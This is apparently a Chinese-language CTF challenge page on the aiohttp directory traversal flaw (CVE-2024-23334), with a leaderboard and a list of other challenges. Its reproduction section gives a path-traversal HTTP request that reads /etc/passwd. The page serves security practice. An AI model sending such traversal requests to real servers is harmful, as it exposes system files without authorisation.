aiohttp_目录遍历

题目描述：

aiohttp 目录遍历漏洞（CVE-2024-23334）

题目提示：

aiohttp 是一个基于 asyncio 和 Python 的异步 HTTP 客户端/服务器框架。

在将 aiohttp 用作 Web 服务器并配置静态路由时，必须指定静态文件的根路径。此外，可以使用 follow_symlinks 选项来决定是否跟随指向静态根目录之外的符号链接。当 follow_symlinks 设置为 True 时，aiohttp 不会验证所读取的文件是否位于静态根目录之内。这可能导致目录遍历漏洞，从而使攻击者可以未经授权访问系统上的任意文件，即使系统中没有实际存在符号链接。该漏洞影响的版本包括 3.9.1 及以下。

参考链接：

漏洞复现

利用此漏洞，可以构造恶意路径，从而访问服务器中任意文件。

例如，构造如下请求来查看系统文件/etc/passwd:

GET /static/../../../../../etc/passwd HTTP/1.1
Host: your-ip:8080
Content-Length: 2

如果操作成功，即可以看到/etc/passwd的内容，证明漏洞存在。

作者

snow

解题次数

一血

暂无

消耗金币

分数

100

最高奖励

创建题目环境

提交

您尚未登录，请登录或注册后评论

0 人参与 | 0 条评论

个人空间

创建题目

竞赛列表

创建比赛

题目

解题

分数

金币

学习岛

分数排行

1
F1rstb100d
2100
2
1529624321@qq.com
1600
3
3099967366@qq.com
1200
4
cjz-chen
900
5
tim
600
6
grok
600
7
snow
500
8
3512514339@qq.com
400
9
av3bqevx6
300
10
youxia
300

题目动态

snow 上线了 CVE Spring表达式注入 2月前
snow 上线了 CVE spring_文件读取 2月前
snow 上线了 CVE Jenkins_文件读取 2月前
snow 上线了 CVE aiohttp_目录遍历 2月前
snow 上线了 CVE CXF_请求伪造 2月前
snow 上线了 CVE 1Panel_SQL 2月前